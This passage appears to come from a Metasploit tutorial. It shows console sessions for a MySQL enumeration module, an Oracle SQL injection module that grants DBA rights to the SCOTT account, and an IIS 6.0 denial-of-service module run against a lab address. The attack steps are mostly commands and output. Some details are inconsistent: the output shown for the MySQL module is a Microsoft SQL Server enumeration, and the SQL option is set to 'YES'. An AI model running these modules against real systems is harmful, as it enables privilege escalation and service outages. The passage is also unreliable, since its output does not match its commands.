1. Working with auxiliary admin modules

msf > use auxiliary/admin/mysql/mysql_enum

msf  auxiliary(mysql_enum) > show options

Module options (auxiliary/admin/mysql/mysql_enum):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD                   no        The password for the..
   RHOST                      yes       The target address
   RPORT     3306             yes       The target port
   USERNAME                   no        The username to..

msf  auxiliary(mysql_enum) > exploit

[*] Configuration Parameters:
[*]     C2 Audit Mode is Not Enabled
[*]     xp_cmdshell is Enabled
[*]     remote access is Enabled
[*]     allow updates is Not Enabled
[*]     Database Mail XPs is Not Enabled
[*]     Ole Automation Procedures are Not Enabled
[*] Databases on the server: 
[*]     Database name:master
===========================================================

2. SQL injection and DOS attack module

msf  auxiliary(dbms_metadata_get_xml) > show options

Module options (auxiliary/sqli/oracle/dbms_metadata_get_xml):

   Name    Current Setting     Required  Description
   ----    ---------------     --------  -----------
   DBPASS  TIGER               yes       The password to..
   DBUSER  SCOTT               yes       The username to..
   RHOST                       yes       The Oracle host.
   RPORT   1521                yes       The TNS port.
   SID     ORCL                yes       The sid to authenticate.
   SQL     GRANT DBA to SCOTT  no        SQL to execute.

msf  auxiliary(dbms_metadata_get_xml) > set RHOST 192.168.56.1
msf  auxiliary(dbms_metadata_get_xml) > set SQL YES

msf  auxiliary(dbms_metadata_get_xml) > run

The next module that we will cover is related to the Denial Of Service (DOS) attack. 
We will analyze a simple IIS 6.0 vulnerability which allows the attacker to crash the server 
by sending a POST request containing more than 40000 request parameters. We will analyze 
the vulnerability shortly. This module has been tested on an unpatched Windows 2003 
server running IIS 6.0. The module we will be using is ms10_065_ii6_asp_dos:
msf > use auxiliary/dos/windows/http/ms10_065_ii6_asp_dos

msf  auxiliary(ms10_065_ii6_asp_dos) > show options

Module options (auxiliary/dos/windows/http/ms10_065_ii6_asp_dos):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  80               yes       The target port
   URI    /page.asp        yes       URI to request
   VHOST                   no        The virtual host name to..

msf  auxiliary(ms10_065_ii6_asp_dos) > set RHOST 192.168.56.1
RHOST => 192.168.56.1
msf  auxiliary(ms10_065_ii6_asp_dos) > run

[*] Attacking http://192.168.56.1:80/page.asp


